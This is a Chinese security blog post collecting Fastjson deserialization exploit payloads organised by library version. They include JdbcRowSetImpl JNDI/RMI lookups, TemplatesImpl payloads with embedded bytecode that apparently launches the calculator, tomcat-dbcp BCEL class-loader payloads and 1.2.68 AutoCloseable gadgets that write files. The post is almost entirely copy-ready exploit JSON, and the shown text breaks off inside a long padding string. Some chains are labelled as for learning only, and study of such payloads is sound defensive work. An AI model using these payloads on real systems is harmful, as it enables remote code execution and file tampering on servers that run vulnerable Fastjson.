fastjson payload大集合

admin 2022年1月5日04:03:19安全文章评论28 views40490字阅读134分58秒阅读模式

来自全网收集,均非本人原创,加载code部分基本为windows计算器。有部分payload不太好生成,因此文章末尾附上代码。

fastjson<=1.2.24

{    "a": {        "@type": "com.sun.rowset.JdbcRowSetImpl",         "dataSourceName": "rmi://127.0.0.1:1099/Object",         "autoCommit": true    }}

fastjson<1.2.48

{    "a": {        "@type": "java.lang.Class",         "val": "com.sun.rowset.JdbcRowSetImpl"    },     "b": {        "@type": "com.sun.rowset.JdbcRowSetImpl",         "dataSourceName": "rmi://127.0.0.1:1099/Object",         "autoCommit": true    }}

fastjson<=1.2.24,此链基本无用,仅供学习。

{    "a": {        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",         "_bytecodes": [            "yv66vgAAADQALAcAAgEAGHBheWxvYWQvVGVtcGxhdGVzSW1wbGNtZAcABAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBAAY8aW5pdD4BAAMoKVYBAApFeGNlcHRpb25zBwAJAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEABENvZGUKAAMADAwABQAGCgAOABAHAA8BABFqYXZhL2xhbmcvUnVudGltZQwAEQASAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAFAEABGNhbGMKAA4AFgwAFwAYAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABpMcGF5bG9hZC9UZW1wbGF0ZXNJbXBsY21kOwEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYHACcBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBABVUZW1wbGF0ZXNJbXBsY21kLmphdmEAIQABAAMAAAAAAAMAAQAFAAYAAgAHAAAABAABAAgACgAAAEAAAgABAAAADiq3AAu4AA0SE7YAFVexAAAAAgAZAAAADgADAAAACgAEAAsADQAMABoAAAAMAAEAAAAOABsAHAAAAAEAHQAeAAEACgAAAEkAAAAEAAAAAbEAAAACABkAAAAGAAEAAAAPABoAAAAqAAQAAAABABsAHAAAAAAAAQAfACAAAQAAAAEAIQAiAAIAAAABACMAJAADAAEAHQAlAAIABwAAAAQAAQAmAAoAAAA/AAAAAwAAAAGxAAAAAgAZAAAABgABAAAAEgAaAAAAIAADAAAAAQAbABwAAAAAAAEAHwAgAAEAAAABACgAKQACAAEAKgAAAAIAKw=="        ],         "_name": "aaa",         "_tfactory": { },         "_outputProperties": { }    }}

fastjson<1.2.48,此链基本无用,仅供学习。

{    "a": {        "@type": "java.lang.Class",         "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"    },     "b": {        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",         "_bytecodes": [            "yv66vgAAADQALAcAAgEAGHBheWxvYWQvVGVtcGxhdGVzSW1wbGNtZAcABAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBAAY8aW5pdD4BAAMoKVYBAApFeGNlcHRpb25zBwAJAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEABENvZGUKAAMADAwABQAGCgAOABAHAA8BABFqYXZhL2xhbmcvUnVudGltZQwAEQASAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAFAEABGNhbGMKAA4AFgwAFwAYAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABpMcGF5bG9hZC9UZW1wbGF0ZXNJbXBsY21kOwEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYHACcBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBABVUZW1wbGF0ZXNJbXBsY21kLmphdmEAIQABAAMAAAAAAAMAAQAFAAYAAgAHAAAABAABAAgACgAAAEAAAgABAAAADiq3AAu4AA0SE7YAFVexAAAAAgAZAAAADgADAAAACgAEAAsADQAMABoAAAAMAAEAAAAOABsAHAAAAAEAHQAeAAEACgAAAEkAAAAEAAAAAbEAAAACABkAAAAGAAEAAAAPABoAAAAqAAQAAAABABsAHAAAAAAAAQAfACAAAQAAAAEAIQAiAAIAAAABACMAJAADAAEAHQAlAAIABwAAAAQAAQAmAAoAAAA/AAAAAwAAAAGxAAAAAgAZAAAABgABAAAAEgAaAAAAIAADAAAAAQAbABwAAAAAAAEAHwAgAAEAAAABACgAKQACAAEAKgAAAAIAKw=="        ],         "_name": "aaa",         "_tfactory": { },         "_outputProperties": { }    }}

fastjson<=1.2.24,JDK<8u251,tomcat-dbcp

{    {    "aaa": {            "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource",             "driverClassLoader": {                "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"            },             "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85Uks$SW$Y$7e$OYXX$97$q$Ss$a1$b5i$ec$c5$A$g$b0j$ab$N$a9$adI$d5X$89$c6$90$sE$7b$5b$96$T$dc$U$WfY$3a$fa$8b$fcl$3f$80$d3$cc$d8$8f$9d$e9o$f17$98$3eg$n$JT$9c2$b3$7b$f6$bc$d7$e7$7d$ce$fb$k$fey$f3$e7$x$AW$b1$af$p$q$606$adg$b5$86U$c9$adY5$5b$87$s0$b9o$fdn$e5j$96$5b$cd$3d$u$efK$db$X$88$ae$d85$c7u$fc$h$Cc$a9$f4$8e$80$b6$d6$a8H$D$C1$T$GNQP$b7$iW$60$s$f5$b8p$e2$5e$f4$3d$c7$ad$e6$d3$3b$G$e2$98$d01$$0u$a2$bd$f5$d4$96M$dfi$b8$s$s$R$R$98h$d2$da$_$fa$96$fd$db$b6g$d9$92$92$82$e3$ca$fb$edzYz$dbV$b9FI$a2$d0$b0$ad$da$8e$e59j$df$X$K$3e$d3$85$R$81$f3$C$f1$m$de$86$d5$ec$dbFV$82$3a$M$8ca$ce$c4$8c$ca$ab$f9O$9c$96$c0xa$90$J$ba$g$c7qZ$G$3e$c0$87$3a$e6$FN$9f$a4$d9j$bb$beS$97$s$Wp$8e$d6U$e9$f7$rD$93J$X$de2$ccG$f11k$b2$eb$95$ac$7c$w$Xr$f6$CK$b1U$e8OM$9c$c7$o$91Pn$L$y$a6Fp8$m$da$f4$g$b6l$b5$f2$G$d2$b8$a0$p3$84$aa$af4q$RK$y$8a$a8$ee$ba$cd6i$f5$a4U$X$98$3dB$e64r$D$8a$bc$8e$iO$efH$b3$da$de$db$93$9e$aclI$ab$o$3d$j$9f$J$qGx$f5$d4$G$$$e1$8a$e2$f2$aa$c0$5cjdt$d5$BY$7c$a1$8c$ae$b1$HN$8cz$R$a8$d7$f1$r$c1$fd$b7$ec$d5$b6S$L2$5c$c7$9cz$ad$98$f8$Kl$c2$88$d5lJ$b7$o$b0$f4$3fT$N$85$e1$B$7c$c3n1$U$96U$Tk$f8$96$9dM$7c$V$d5f$CgRo$7b$e6U$d6$db$s$ee$E$b6$7e$a3$t$8d$e1$$$ee$e9$f8nhV$8a$cfZ$be$ac$9b$u$60$83S$d2h$fb$c7M$c9$3a7$7b$ad$j$90a$e0$B$k$ea$d8$3c$g$86a$b5$89$z$U$F$f4$60$Yj$ae$ea$a5wM$d4$f7$8aO$daj$96We$DO$8d$Y$bd$mP$d0$Q$d4$8fh$n$81$90$g$db$e9$91$a7Fe$d9$e3$99$WF$b7$F$f5Z$z$60$$1$wq$a8Uf$d7$bc$f3$y$c8Q$cbgk$ed$ea$90$DL$M$e4$d7Q$j$s8$f0$e7$a4$V$hm$cf$96$b7$j5$cf15$acYe$84s$bc$8e$c6$a0$7ec$88$o$8c$I$f7$3aw$3fp$V$5c$e3$e2$r$a2$cf$R$bd$97$e9$c0$7c$R$884$g$c4i$7e$9a$df$J$ee$40G$N1$beO$c1$a4$sA$89IK$r$9d$c2$Z$ee$a6$f9$f0$de$bcC$3f$8d$8a$99$e3$y$b9$7e$96p$a6$8b$d9$X$fc$I$FQ$p$3d$e1q$q$f5$9d$c4$7b$5cc$ea$e2$a4$d5$fb$B$O$deT$w$8c8O$bd$K$f7$e8$r$ce$s$3e$ea$e0$93$c2$85$OR$h$H$c8$96$Op$a9t$b1$8b$cb$5d$7c$7e$ff$A$d7K$5d$y$_$87$9fc2$ZNj$j$e4$T_$f3$b5$bb$d4$c1$cd$d2$b2$f6$f7$e1$ebd$b8$83$5b$cb$91$3f$b0$9e$8ct$40$8fx$v$Z$e9b$fb$af$80$m$85$zC$E$c0$E$91Lb$9c$92y$d6$b8$c8$w3$ac$f2$g$d7$9b$98$c5$3a$e6$b0I$c4$K$ff$Wy$m2$ec$607$c0$ff$90$d4$96$88$7c$9c$3d$ff$I$8fY$cb$3cV$f0$p$7eb$fc$M$eb$f9$Z$bf$b0$b2$h8$db$ffZ$c4$V$fc$K$8b$V$ae3$5e$99$b2H$c0$e7e$84$O$e9$Q$d1$c1$3f$a0$b4$8e$8a$8e$ac$8e$3d$9d$a3$87C$b26$a4$40$mf$d6$t$B$c7$ce$bf$96$dc$ad$fd$cf$G$A$A"        }    }:"bbb"}

fastjson<1.2.48,JDK<8u251,tomcat-dbcp

{    {        "a": {            "@type": "java.lang.Class",            "val": "org.apache.tomcat.dbcp.dbcp.BasicDataSource"        },        "b": {            "@type": "java.lang.Class",            "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"        },        "c": {            "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource",            "driverClassLoader": {                "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"            },            "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85Uks$SW$Y$7e$OYXX$97$q$Ss$a1$b5i$ec$c5$A$g$b0j$ab$N$a9$adI$d5X$89$c6$90$sE$7b$5b$96$T$dc$U$WfY$3a$fa$8b$fcl$3f$80$d3$cc$d8$8f$9d$e9o$f17$98$3eg$n$JT$9c2$b3$7b$f6$bc$d7$e7$7d$ce$fb$k$fey$f3$e7$x$AW$b1$af$p$q$606$adg$b5$86U$c9$adY5$5b$87$s0$b9o$fdn$e5j$96$5b$cd$3d$u$efK$db$X$88$ae$d85$c7u$fc$h$Cc$a9$f4$8e$80$b6$d6$a8H$D$C1$T$GNQP$b7$iW$60$s$f5$b8p$e2$5e$f4$3d$c7$ad$e6$d3$3b$G$e2$98$d01$$0u$a2$bd$f5$d4$96M$dfi$b8$s$s$R$R$98h$d2$da$_$fa$96$fd$db$b6g$d9$92$92$82$e3$ca$fb$edzYz$dbV$b9FI$a2$d0$b0$ad$da$8e$e59j$df$X$K$3e$d3$85$R$81$f3$C$f1$m$de$86$d5$ec$dbFV$82$3a$M$8ca$ce$c4$8c$ca$ab$f9O$9c$96$c0xa$90$J$ba$g$c7qZ$G$3e$c0$87$3a$e6$FN$9f$a4$d9j$bb$beS$97$s$Wp$8e$d6U$e9$f7$rD$93J$X$de2$ccG$f11k$b2$eb$95$ac$7c$w$Xr$f6$CK$b1U$e8OM$9c$c7$o$91Pn$L$y$a6Fp8$m$da$f4$g$b6l$b5$f2$G$d2$b8$a0$p3$84$aa$af4q$RK$y$8a$a8$ee$ba$cd6i$f5$a4U$X$98$3dB$e64r$D$8a$bc$8e$iO$efH$b3$da$de$db$93$9e$aclI$ab$o$3d$j$9f$J$qGx$f5$d4$G$$$e1$8a$e2$f2$aa$c0$5cjdt$d5$BY$7c$a1$8c$ae$b1$HN$8cz$R$a8$d7$f1$r$c1$fd$b7$ec$d5$b6S$L2$5c$c7$9cz$ad$98$f8$Kl$c2$88$d5lJ$b7$o$b0$f4$3fT$N$85$e1$B$7c$c3n1$U$96U$Tk$f8$96$9dM$7c$V$d5f$CgRo$7b$e6U$d6$db$s$ee$E$b6$7e$a3$t$8d$e1$$$ee$e9$f8nhV$8a$cfZ$be$ac$9b$u$60$83S$d2h$fb$c7M$c9$3a7$7b$ad$j$90a$e0$B$k$ea$d8$3c$g$86a$b5$89$z$U$F$f4$60$Yj$ae$ea$a5wM$d4$f7$8aO$daj$96We$DO$8d$Y$bd$mP$d0$Q$d4$8fh$n$81$90$g$db$e9$91$a7Fe$d9$e3$99$WF$b7$F$f5Z$z$60$$1$wq$a8Uf$d7$bc$f3$y$c8Q$cbgk$ed$ea$90$DL$M$e4$d7Q$j$s8$f0$e7$a4$V$hm$cf$96$b7$j5$cf15$acYe$84s$bc$8e$c6$a0$7ec$88$o$8c$I$f7$3aw$3fp$V$5c$e3$e2$r$a2$cf$R$bd$97$e9$c0$7c$R$884$g$c4i$7e$9a$df$J$ee$40G$N1$beO$c1$a4$sA$89IK$r$9d$c2$Z$ee$a6$f9$f0$de$bcC$3f$8d$8a$99$e3$y$b9$7e$96p$a6$8b$d9$X$fc$I$FQ$p$3d$e1q$q$f5$9d$c4$7b$5cc$ea$e2$a4$d5$fb$B$O$deT$w$8c8O$bd$K$f7$e8$r$ce$s$3e$ea$e0$93$c2$85$OR$h$H$c8$96$Op$a9t$b1$8b$cb$5d$7c$7e$ff$A$d7K$5d$y$_$87$9fc2$ZNj$j$e4$T_$f3$b5$bb$d4$c1$cd$d2$b2$f6$f7$e1$ebd$b8$83$5b$cb$91$3f$b0$9e$8ct$40$8fx$v$Z$e9b$fb$af$80$m$85$zC$E$c0$E$91Lb$9c$92y$d6$b8$c8$w3$ac$f2$g$d7$9b$98$c5$3a$e6$b0I$c4$K$ff$Wy$m2$ec$607$c0$ff$90$d4$96$88$7c$9c$3d$ff$I$8fY$cb$3cV$f0$p$7eb$fc$M$eb$f9$Z$bf$b0$b2$h8$db$ffZ$c4$V$fc$K$8b$V$ae3$5e$99$b2H$c0$e7e$84$O$e9$Q$d1$c1$3f$a0$b4$8e$8a$8e$ac$8e$3d$9d$a3$87C$b26$a4$40$mf$d6$t$B$c7$ce$bf$96$dc$ad$fd$cf$G$A$A"        }    }:"bbb"}

fastjson<=1.2.68,JDK11

https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/

{    "@type":"java.lang.AutoCloseable",    "@type":"sun.rmi.server.MarshalOutputStream",    "out":    {        "@type":"java.util.zip.InflaterOutputStream",        "out":        {           "@type":"java.io.FileOutputStream",           "file":"1.txt",           "append":false        },        "infl":        {            "input":            {                "array":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw==",                "limit":22            }        },        "bufLen":1048576    },    "protocolVersion":1}

fastjson<=1.2.68,commons-io-2.0至2.6

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""testaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa